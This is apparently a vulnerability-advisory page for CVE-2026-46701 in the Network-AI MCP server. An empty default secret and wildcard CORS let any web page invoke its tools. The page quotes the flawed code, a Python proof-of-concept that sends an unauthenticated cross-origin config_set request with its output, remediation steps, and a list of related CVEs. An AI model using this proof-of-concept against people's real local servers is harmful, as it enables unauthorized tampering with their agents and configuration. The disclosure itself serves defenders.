Skip to main content

Network-AI CVE-2026-46701

HIGH
Origin Validation Error (CWE-346)
2026-05-21 https://github.com/Jovancoding/Network-AI GHSA-j3vx-cx2r-pvg8
7.6
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.6 HIGH
AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
High
Availability
Low

Lifecycle Timeline

2
Source Code Evidence Fetched
May 21, 2026 - 23:15 vuln.today
Analysis Generated
May 21, 2026 - 23:15 vuln.today

DescriptionGitHub Advisory

Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret

FieldValue
RepositoryJovancoding/Network-AI
Affected versionv5.4.4 (commit c12686e181f231cf8d7bcf836a96d78f0f0877ac)

Summary

The MCP SSE server defaults to an empty secret (process.env['NETWORK_AI_MCP_SECRET'] ?? '' at bin/mcp-server.ts:89), which causes _isAuthorized (lib/mcp-transport-sse.ts:254) to return true unconditionally for every request - no Authorization header is required. Simultaneously, _handleRequest sets Access-Control-Allow-Origin: * (lib/mcp-transport-sse.ts:272) on every response, so a cross-origin browser fetch can read the result without restriction. An unauthenticated attacker who can lure a user to a malicious web page can invoke all 22 exposed MCP tools - including config_set, agent_spawn, and blackboard_write - against a default-configured localhost server.

Affected Code

bin/mcp-server.ts:89 - default secret resolves to empty string, enabling open access

typescript
    secret: process.env['NETWORK_AI_MCP_SECRET'] ?? '',

lib/mcp-transport-sse.ts:254 - auth guard short-circuits to true when secret is falsy

typescript
  private _isAuthorized(req: http.IncomingMessage): boolean {
    if (!this._opts.secret) return true;
    const authHeader = req.headers['authorization'];
    if (typeof authHeader !== 'string') return false;
    const parts = authHeader.split(' ');
    return parts[0]?.toLowerCase() === 'bearer' && parts[1] === this._opts.secret;
  }

lib/mcp-transport-sse.ts:272 - wildcard CORS header applied unconditionally before any auth check

typescript
  private _handleRequest(req: http.IncomingMessage, res: http.ServerResponse): void {
    // CORS - allow any MCP client to connect
    res.setHeader('Access-Control-Allow-Origin', '*');
    res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');
    res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');

lib/mcp-transport-sse.ts:367-368 - authenticated path dispatches parsed JSON-RPC frame directly to handleRPC with no further caller validation

typescript
        const rpc = JSON.parse(body) as McpJsonRpcRequest;
        const response = await this._bridge.handleRPC(rpc);

Any cross-origin browser request reaches handleRPC because _isAuthorized returns true (empty secret) and the Access-Control-Allow-Origin: * header lets the browser expose the response to the calling script.

Proof of Concept

Environment

  • Network-AI v5.4.4 (latest)
  • Docker container bound to 127.0.0.1:3001
  • Python 3 + requests

poc.py

python
import sys
import requests

BASE = "http://127.0.0.1:3001"
# Step 1: Verify CORS wildcard (simulating cross-origin preflight)
preflight = requests.options(
    f"{BASE}/mcp",
    headers={
        "Origin": "http://evil.example.com",
        "Access-Control-Request-Method": "POST",
        "Access-Control-Request-Headers": "Content-Type",
    },
)
acao = preflight.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] OPTIONS /mcp -> {preflight.status_code}, Access-Control-Allow-Origin: {acao!r}")
if acao != "*":
    print(f"RESULT: FAIL - expected ACAO='*', got {acao!r}")
    sys.exit(1)
# Step 2: Invoke config_set with NO Authorization header from cross-origin
rpc_payload = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
        "name": "config_set",
        "arguments": {
            "key": "maxParallelAgents",
            "value": "999"
        }
    }
}
resp = requests.post(
    f"{BASE}/mcp",
    json=rpc_payload,
    headers={
        "Content-Type": "application/json",
        "Origin": "http://evil.example.com",
# No Authorization header - exploiting empty-secret bypass
    },
)
print(f"[*] POST /mcp (no auth, cross-origin) -> {resp.status_code}")
print(f"[*] Response body: {resp.text[:800]}")
resp_acao = resp.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] Response Access-Control-Allow-Origin: {resp_acao!r}")
if resp.status_code != 200:
    print(f"RESULT: FAIL - expected 200, got {resp.status_code}")
    sys.exit(1)

body = resp.json()
result_content = body.get("result", {})
is_error = result_content.get("isError", True)
if is_error:
    print(f"RESULT: FAIL - tool returned isError=true: {result_content}")
    sys.exit(1)
# Step 3: Confirm CORS header on actual response (browser can read it)
if resp_acao != "*":
    print(f"RESULT: FAIL - response ACAO not '*', browser would block read: {resp_acao!r}")
    sys.exit(1)

print(f"RESULT: PASS - unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)")

Output

[*] OPTIONS /mcp -> 204, Access-Control-Allow-Origin: '*'
[*] POST /mcp (no auth, cross-origin) -> 200
[*] Response body: {"jsonrpc":"2.0","id":1,"result":{"content":[{"type":"text","text":"{\"ok\":true,\"tool\":\"config_set\",\"data\":{\"key\":\"maxParallelAgents\",\"previous\":null,\"current\":999,\"applied\":true}}"}],"isError":false}}
[*] Response Access-Control-Allow-Origin: '*'
RESULT: PASS - unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)

Verified conditions

  1. OPTIONS /mcp → 204, Access-Control-Allow-Origin: * - browser preflight accepted by server
  2. POST /mcp (no Authorization header) → 200, isError: false - config_set executed without credentials
  3. Response Access-Control-Allow-Origin: * - response is readable by the calling script in a browser context, confirming the attack is viable from a cross-origin malicious page

Impact

Any web page visited by a user who has the Network-AI MCP server running locally (default port 3001, no secret) can silently invoke all 22 MCP tools without credentials. Verified impact includes arbitrary orchestrator configuration mutation (config_set); the same vector applies to agent_spawn (spawning arbitrary agents), blackboard_write / blackboard_delete (corrupting shared agent state), and token_create / token_revoke (tampering with token management). Confidentiality impact is limited to data readable via MCP tools (blackboard contents, audit log queries); integrity impact is high because core orchestrator state can be overwritten; availability impact is low (service continues running but with attacker-controlled configuration).

Remediation

  1. Require a non-empty secret at startup: in bin/mcp-server.ts, reject launch when args.secret is empty and --stdio is not set:
typescript
   if (!args.secret && !args.stdio) {
     console.error('ERROR: --secret <token> or NETWORK_AI_MCP_SECRET must be set for SSE mode.');
     process.exit(1);
   }
  1. Restrict CORS to localhost origins only: in lib/mcp-transport-sse.ts:_handleRequest, replace the wildcard with an allowlist:
typescript
   const origin = req.headers['origin'] ?? '';
   const allowed = /^https?:\/\/(localhost|127\.0\.0\.1)(:\d+)?$/.test(origin);
   res.setHeader('Access-Control-Allow-Origin', allowed ? origin : '');
   res.setHeader('Vary', 'Origin');
  1. Move CORS headers after the auth check so a rejected request never advertises cross-origin access, or apply CORS only on the SSE endpoint (/sse) if cross-origin streaming is needed and not on /mcp.

AnalysisAI

Unauthenticated cross-origin MCP tool invocation in Network-AI v5.4.4 allows a remote attacker to lure a victim to a malicious web page that silently invokes any of the 22 exposed MCP tools (including config_set, agent_spawn, blackboard_write, and token_create/revoke) against the victim's locally running MCP SSE server. The vulnerability stems from an empty default secret combined with a wildcard CORS policy, and publicly available exploit code exists in the GHSA advisory demonstrating end-to-end exploitation. No CISA KEV listing yet and EPSS data was not provided, but the published PoC and trivial attack mechanics make this a meaningful risk for any user running the default Docker deployment.

Technical ContextAI

Network-AI is an npm-published TypeScript orchestration tool (pkg:npm/network-ai) that exposes a Model Context Protocol (MCP) Server-Sent Events transport on port 3001. Two defects compound into the vulnerability: bin/mcp-server.ts:89 resolves the bearer secret via process.env['NETWORK_AI_MCP_SECRET'] ?? '', and lib/mcp-transport-sse.ts:254 short-circuits _isAuthorized to return true whenever the configured secret is falsy. At the same time, lib/mcp-transport-sse.ts:272 unconditionally sets Access-Control-Allow-Origin: * before any auth check, meaning the response is readable by cross-origin browser scripts. This maps cleanly to CWE-346 (Origin Validation Error): the server fails to validate the origin of cross-domain requests and pairs it with broken authentication, letting any web page act on behalf of the local user against their MCP server.

RemediationAI

Vendor-released patch: 5.4.5 - upgrade the network-ai npm package to 5.4.5 or later (npm install network-ai@5.4.5) per the GHSA-j3vx-cx2r-pvg8 advisory. If immediate upgrade is not possible, set a strong NETWORK_AI_MCP_SECRET environment variable (or --secret <token> flag) before launching the server so _isAuthorized enforces bearer-token checks; note this only closes the empty-secret bypass and leaves the wildcard CORS in place, so cross-origin scripts can still attempt requests but will fail without the token. As additional hardening described in the advisory, restrict CORS to localhost origins by replacing the wildcard with an allowlist for http(s)://localhost or 127.0.0.1 and add Vary: Origin, and reorder the CORS headers to apply only after the auth check so rejected requests do not advertise cross-origin access; the trade-off is that any legitimate cross-origin MCP client will need to be added to the allowlist explicitly.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-46701 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy